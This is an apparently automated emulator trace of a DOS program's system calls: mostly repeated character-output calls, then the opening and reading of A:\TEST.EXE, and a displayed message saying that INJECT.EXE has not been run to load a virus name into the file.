2018-12-25T11:58:59.666327627Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.678565363Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.681191456Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.683869541Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.687621302Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.690065356Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.693274949Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.69676275Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.698482706Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.70032172Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.702688223Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.704468859Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.706808079Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.709403142Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.712804047Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.71560303Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.718325257Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.721484741Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.723883618Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.728702637Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.732439613Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.735118065Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.737693313Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.742776036Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.74546595Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.747957877Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.750808563Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.753631862Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.757934232Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.76244991Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.765463739Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.768368264Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.772401249Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.775446687Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.778263152Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.780607997Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.78381959Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.785547503Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.787654856Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.790400193Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.792665559Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.795257398Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.798310876Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.800897961Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.803156592Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.806129576Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.809708837Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.812005595Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.814986512Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.817675099Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.820124226Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.822740443Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.825709376Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.828212696Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.830662546Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.833852515Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.836311003Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.839083546Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.842489242Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.844092232Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.845692714Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.848344065Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.849966031Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.851546201Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.853822199Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.855479635Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.857381482Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.859647139Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.861274078Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.862948145Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.865484609Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.867255739Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.869101824Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.871750985Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.874489675Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.87672687Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.881034349Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.882655542Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.884496765Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.886707124Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.888845291Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.890508245Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.893459259Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.895075954Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.896921139Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.900313395Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.905209946Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.908563446Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.911666373Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.914379929Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.916446056Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.918145719Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.920826794Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.922824705Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.924455826Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.926589028Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.928624764Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.930899039Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.933004528Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.935067689Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.936707143Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.939095162Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.940674779Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.94227354Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.944421134Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.945975396Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.9475703Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.949484578Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.95105569Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.952652602Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.95461815Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.956196952Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.958227321Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.960911481Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.963664865Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.965410076Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.967585748Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.969296564Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.970973445Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.97325441Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.975126629Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.976839694Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.979012001Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.981360398Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.983649242Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.986643113Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.988924166Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.991619618Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:58:59.994811951Z 61 PC: 12a69 | Open file (Filename = 'A:\TEST.EXE')
2018-12-25T11:58:59.999722716Z 63 PC: 12a69 | Read file or device (See above)
2018-12-25T11:59:00.004339904Z 62 PC: 12a69 | Close file (See above)
2018-12-25T11:59:00.00752398Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.010343084Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.012757603Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.015674221Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.019421358Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.022481842Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.025679732Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.028460669Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.03125698Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.036383156Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.039074045Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.041780078Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.045397056Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.047789894Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.050913319Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.054757921Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.057440071Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.060226894Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.063251932Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.065602872Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.067959918Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.072793371Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.075073688Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.077671954Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.081595526Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.084686147Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.088265551Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.091835871Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.094535094Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.09730662Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.100895371Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.103585645Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.106128199Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.112357207Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.116749217Z 2 PC: 12bae | Character output (See above)
2018-12-25T11:59:00.119091947Z 9 PC: 12b93 | Display string (String= 'This file has not had the INJECT.EXE run on it to load the Virus name into it ')
2018-12-25T11:59:00.127141537Z 76 PC: 12a69 | Terminate with return code (See above)